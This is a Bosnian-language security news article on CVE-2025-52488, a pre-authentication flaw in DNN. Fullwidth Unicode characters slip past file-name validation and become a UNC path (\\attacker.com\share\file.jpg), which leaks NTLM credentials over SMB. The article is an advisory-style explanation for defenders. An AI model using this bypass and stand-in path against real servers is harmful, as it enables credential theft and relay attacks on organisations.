DNN Vulnerability: NTLM Credentials Compromitovane Bypasom Unicode Normalizacije, Oprez pri Korištenju

Uočena je kritična ranjivost u DNN (ranije poznatom kao DotNetNuke), sistemu za upravljanje sadržajem, koja omogućava napadačima da ukradu NTLM akreditive putem sofisticirane tehnike zaobilaženja normalizacije Unicode znakova. Ova ranjivost, označena kao CVE-2025-52488, pogađa jedan od najstarijih open-source CMS sistema i pokazuje kako se odbrambene kodne mjere mogu zaobići vještim iskorištavanjem specifičnosti Windowsa i .NET-a.

Ključne tačke uključuju:
1. CVE-2025-52488 u DNN omogućava napadačima da ukradu NTLM akreditive bez potrebe za korisničkom autentifikacijom.
2. Specifični Unicode znakovi (U+FF0E, U+FF3C) se normalizuju u tačke i kose crte nakon prolaska sigurnosne validacije, čime se zaobilaze zaštitni mehanizmi.
3. Zlonamjerni nazivi datoteka transformišu se u UNC putanje (\\attacker.com\share) koje pokreću SMB konekcije prema serverima pod kontrolom napadača putem funkcije File.Exists.
4. Omogućava krađu NTLM akreditiva, što utiče na preduzeća i demonstrira kako se odbrambeno kodiranje može potkopati transformacijom kodiranja karaktera.

Kompanija Searchlight Cyber izvještava da ranjivost koristi temeljnu slabost u načinu na koji .NET aplikacije obrađuju operacije datotečnog sistema na Windows mašinama. Kada napadači kontrolišu putanje datoteka, mogu pružiti UNC (Universal Naming Convention) putanje koje pokreću vanredne pozive prema SMB serverima pod kontrolom napadača. Ovaj mehanizam postaje posebno opasan kada se kombinuje sa funkcijama kao što su File.Exists, System.Net.HttpRequest i System.Net.WebClient, koje mogu nehotice procuriti NTLM akreditive na zlonamjerne servere.

Napad se oslanja na ponašanje funkcije Path.Combine u C#, gdje se, ako drugi argument sadrži apsolutnu putanju, prvi argument potpuno zanemaruje. Prema dokumentaciji Microsofta, “ako argument koji nije prvi sadrži korijensku putanju, sve prethodne komponente putanje se zanemaruju, a vraćeni string počinje s tom korijenskom komponentom putanje.” Ovo ponašanje, iako dokumentovano, često dovodi do sigurnosnih ranjivosti u C# kodnim bazama.

Tehnička analiza otkriva da se jezgro ove ranjivosti nalazi u procesu rukovanja Unicode znakovima u DNN-u. Aplikacija implementira višestruke sigurnosne granice kako bi spriječila zlonamjerne prijenose datoteka, uključujući pozive Path.GetFileName, zamjene regularnim izrazima i funkcije validacije kao što su Utility.ValidateFileName i Utility.CleanFileName. Međutim, ove sigurnosne provjere se odvijaju prije ključne funkcije Utility.ConvertUnicodeChars.

Funkcija ConvertUnicodeChars sadrži kritičnu ranjivost u navedenom retku koda. Ovaj proces normalizacije pretvara Unicode znakove u ASCII ekvivalente, efektivno zaobilazeći sve prethodno implementirane sigurnosne mjere. Istraživači su otkrili specifične Unicode znakove koji se normalizuju u opasne komponente putanje:

* %EF%BC%8E (U+FF0E): “FULLWIDTH FULL STOP” se normalizuje u “.”
* %EF%BC%BC (U+FF3C): “FULLWIDTH REVERSE SOLIDUS” se normalizuje u “”

Ovi znakovi omogućavaju napadačima da konstruišu zlonamjerne nazive datoteka koji izgledaju sigurno tokom početne validacije, ali se transformišu u UNC putanje nakon normalizacije. Eksploatacijski teret demonstrira ovo, postajući kada se obradi: \\attacker.com\share\file.jpg, pokrećući SMB konekciju koja curenjem NTLM akreditiva na napadačev Responder server.

Faktori rizika uključuju:
* **Pogođeni proizvodi**: DNN – Svi verzije sa DNNConnect.CKE HTML Editor Provider.
* **Uticaj**: Krađa NTLM akreditiva.
* **Preduslovi za eksploataciju**: Nije potrebna autentifikacija (ranjivost prije autentifikacije); ciljni sistem pokreće DNN sa funkcionalnošću prijenosa datoteka; Windows okruženje sa omogućenim SMB-om; server pod kontrolom napadača za primanje NTLM hash-eva.
* **CVSS 3.1 rejting**: 8.6 (Visok).

Ova ranjivost naglašava složenost rukovanja Unicode znakovima u web aplikacijama i pokazuje kako se odbrambene programske mjere mogu potkopati transformacijama kodiranja karaktera. Pred-autentifikacijska priroda ove ranjivosti čini je posebno opasnom, jer ne zahtijeva korisničke akreditive za iskorištavanje i može kompromitovati domen akreditive putem NTLM relay napada.

Recent Articles

spot_img

Related Stories